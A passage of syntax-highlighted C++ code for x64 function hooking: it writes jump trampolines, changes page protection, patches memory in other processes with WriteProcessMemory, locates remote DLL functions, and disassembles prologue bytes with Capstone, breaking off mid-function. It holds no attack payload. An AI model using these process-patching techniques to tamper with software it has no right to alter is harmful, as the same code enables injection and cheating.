<span class="n">check</span><span class="p">(</span><span class="n">IsProcess64Bit</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">()));</span>
<span class="c1">//this writes the absolute jump instructions into the memory allocated near the target</span>
<span class="c1">//the E9 jump installed in the target function (GetNum) will jump to here</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//mov 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="p">};</span> <span class="c1">//jmp r10</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">IsProcess64Bit</span><span class="p">(</span><span class="n">process</span><span class="p">));</span>
<span class="c1">//this writes the absolute jump instructions into the memory allocated near the target</span>
<span class="c1">//the E9 jump installed in the target function (GetNum) will jump to here</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//mov 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="p">};</span> <span class="c1">//jmp r10</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">),</span> <span class="nb">nullptr</span><span class="p">);</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteRelativeJump</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">jumpTarget</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="kt">int64_t</span> <span class="n">relativeToJumpTarget64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">jumpTarget</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">relativeToJumpTarget64</span> <span class="o"><</span> <span class="n">INT32_MAX</span><span class="p">);</span>
<span class="kt">int32_t</span> <span class="n">relativeToJumpTarget</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relativeToJumpTarget64</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relativeToJumpTarget</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">err</span> <span class="o">=</span> <span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteRelativeJump</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">jumpTarget</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">numTrailingNOPs</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="kt">int64_t</span> <span class="n">relativeToJumpTarget64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">jumpTarget</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">relativeToJumpTarget64</span> <span class="o"><</span> <span class="n">INT32_MAX</span><span class="p">);</span>
<span class="kt">int32_t</span> <span class="n">relativeToJumpTarget</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relativeToJumpTarget64</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relativeToJumpTarget</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">err</span> <span class="o">=</span> <span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">byteFunc2Hook</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numTrailingNOPs</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">memset</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)(</span><span class="n">byteFunc2Hook</span> <span class="o">+</span> <span class="mi">5</span> <span class="o">+</span> <span class="n">i</span><span class="p">),</span> <span class="mh">0x90</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">)</span> <span class="o">+</span> <span class="n">numTrailingNOPs</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">WriteRelativeJump</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">jumpTarget</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="kt">int64_t</span> <span class="n">relativeToJumpTarget64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">jumpTarget</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">relativeToJumpTarget64</span> <span class="o"><</span> <span class="n">INT32_MAX</span><span class="p">);</span>
<span class="kt">int32_t</span> <span class="n">relativeToJumpTarget</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relativeToJumpTarget64</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relativeToJumpTarget</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">err</span> <span class="o">=</span> <span class="n">VirtualProtectEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">),</span> <span class="nb">nullptr</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">HMODULE</span> <span class="nf">FindModuleBaseAddress</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">targetModule</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">hMods</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">cbNeeded</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">hMods</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">hMods</span><span class="p">),</span> <span class="o">&</span><span class="n">cbNeeded</span><span class="p">))</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="p">(</span><span class="n">cbNeeded</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">));</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">TCHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="n">MAX_PATH</span><span class="p">];</span>
<span class="c1">// Get the full path to the module's file.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">hMods</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span>
<span class="k">sizeof</span><span class="p">(</span><span class="n">moduleName</span><span class="p">)</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">TCHAR</span><span class="p">)))</span>
<span class="p">{</span>
<span class="c1">// Print the module name and handle value.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strstr</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="n">targetModule</span><span class="p">)</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">hMods</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">FindAddressOfRemoteDLLFunction</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">dllName</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">funcName</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//first, load the dll into this process so we can use GetProcAddress to determine the offset</span>
<span class="c1">//of the target function from the DLL base address</span>
<span class="n">HMODULE</span> <span class="n">localDLL</span> <span class="o">=</span> <span class="n">LoadLibraryEx</span><span class="p">(</span><span class="n">dllName</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">localDLL</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">localHookFunc</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">localDLL</span><span class="p">,</span> <span class="n">funcName</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">localHookFunc</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">offsetOfHookFunc</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">localHookFunc</span> <span class="o">-</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">localDLL</span><span class="p">;</span>
<span class="n">FreeLibrary</span><span class="p">(</span><span class="n">localDLL</span><span class="p">);</span> <span class="c1">//free the library, we don't need it anymore.</span>
<span class="c1">//Technically, we could just use the result of GetProcAddress, since in 99% of cases, the base address of the dll</span>
<span class="c1">//in the two processes will be shared thanks to ASLR, but just in case the remote process has relocated the dll, </span>
<span class="c1">//I'm getting it here separately.</span>
<span class="n">HMODULE</span> <span class="n">remoteModuleBase</span> <span class="o">=</span> <span class="n">FindModuleBaseAddress</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">dllName</span><span class="p">);</span>
<span class="k">return</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">remoteModuleBase</span> <span class="o">+</span> <span class="n">offsetOfHookFunc</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">SetOtherThreadsSuspended</span><span class="p">(</span><span class="kt">bool</span> <span class="n">suspend</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">hSnapshot</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span><span class="n">TH32CS_SNAPTHREAD</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hSnapshot</span> <span class="o">!=</span> <span class="n">INVALID_HANDLE_VALUE</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">THREADENTRY32</span> <span class="n">te</span><span class="p">;</span>
<span class="n">te</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">THREADENTRY32</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">Thread32First</span><span class="p">(</span><span class="n">hSnapshot</span><span class="p">,</span> <span class="o">&</span><span class="n">te</span><span class="p">))</span>
<span class="p">{</span>
<span class="k">do</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">te</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">>=</span> <span class="p">(</span><span class="n">FIELD_OFFSET</span><span class="p">(</span><span class="n">THREADENTRY32</span><span class="p">,</span> <span class="n">th32OwnerProcessID</span><span class="p">)</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">DWORD</span><span class="p">))</span>
<span class="o">&&</span> <span class="n">te</span><span class="p">.</span><span class="n">th32OwnerProcessID</span> <span class="o">==</span> <span class="n">GetCurrentProcessId</span><span class="p">()</span>
<span class="o">&&</span> <span class="n">te</span><span class="p">.</span><span class="n">th32ThreadID</span> <span class="o">!=</span> <span class="n">GetCurrentThreadId</span><span class="p">())</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="kr">thread</span> <span class="o">=</span> <span class="o">::</span><span class="n">OpenThread</span><span class="p">(</span><span class="n">THREAD_ALL_ACCESS</span><span class="p">,</span> <span class="n">FALSE</span><span class="p">,</span> <span class="n">te</span><span class="p">.</span><span class="n">th32ThreadID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="kr">thread</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">suspend</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SuspendThread</span><span class="p">(</span><span class="kr">thread</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">ResumeThread</span><span class="p">(</span><span class="kr">thread</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="kr">thread</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">Thread32Next</span><span class="p">(</span><span class="n">hSnapshot</span><span class="p">,</span> <span class="o">&</span><span class="n">te</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">struct</span> <span class="nc">X64Instructions</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">instructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numInstructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numBytes</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">X64Instructions</span> <span class="nf">StealBytes</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">function</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// Disassemble stolen bytes</span>
<span class="n">csh</span> <span class="n">handle</span><span class="p">;</span>
<span class="n">cs_open</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">,</span> <span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="n">cs_option</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">CS_OPT_DETAIL</span><span class="p">,</span> <span class="n">CS_OPT_ON</span><span class="p">);</span> <span class="c1">// turn ON detail feature with CS_OPT_ON</span>
<span class="kt">size_t</span> <span class="n">count</span><span class="p">;</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">disassembledInstructions</span><span class="p">;</span> <span class="c1">//allocated by cs_disasm, needs to be manually freed later</span>
<span class="n">count</span> <span class="o">=</span> <span class="n">cs_disasm</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="o">&</span><span class="n">disassembledInstructions</span><span class="p">);</span>
<span class="c1">//get the instructions covered by the first 5 bytes of the original function</span>
<span class="kt">uint32_t</span> <span class="n">byteCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">stolenInstrCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">disassembledInstructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">byteCount</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="n">stolenInstrCount</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">byteCount</span> <span class="o">>=</span> <span class="mi">5</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//replace stolen instructions in target func wtih NOPs, so that when we jump</span>
<span class="c1">//back to the target function, we don't have to care about how many</span>
<span class="c1">//bytes were stolen</span>
<span class="n">memset</span><span class="p">(</span><span class="n">function</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">byteCount</span><span class="p">);</span>
<span class="n">cs_close</span><span class="p">(</span><span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="k">return</span> <span class="p">{</span> <span class="n">disassembledInstructions</span><span class="p">,</span> <span class="n">stolenInstrCount</span><span class="p">,</span> <span class="n">byteCount</span> <span class="p">};</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeJump</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isAnyJumpInstruction</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_JAE</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_JS</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">isJmp</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_JMP</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithEBorE9</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xEB</span> <span class="o">||</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE9</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isJmp</span> <span class="o">?</span> <span class="n">startsWithEBorE9</span> <span class="o">:</span> <span class="n">isAnyJumpInstruction</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeCall</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isCall</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithE8</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE8</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isCall</span> <span class="o">&&</span> <span class="n">startsWithE8</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">.</span><span class="n">op_count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86_op</span><span class="o">*</span> <span class="n">op</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">operands</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="c1">//mem type is rip relative, like lea rcx,[rip+0xbeef]</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span><span class="o">-></span><span class="n">type</span> <span class="o">==</span> <span class="n">X86_OP_MEM</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//if we're relative to rip</span>
<span class="k">return</span> <span class="n">op</span><span class="o">-></span><span class="n">mem</span><span class="p">.</span><span class="n">base</span> <span class="o">==</span> <span class="n">X86_REG_RIP</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">template</span><span class="o"><</span><span class="k">class</span> <span class="nc">T</span><span class="p">></span>
<span class="n">T</span> <span class="nf">GetDisplacement</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">T</span> <span class="n">disp</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">T</span><span class="p">));</span>
<span class="k">return</span> <span class="n">disp</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//rewrite instruction bytes so that any RIP-relative displacement operands</span>
<span class="c1">//make sense with wherever we're relocating to</span>
<span class="kt">void</span> <span class="nf">RelocateInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstLocation</span><span class="p">)</span>
<span class="p">{</span>
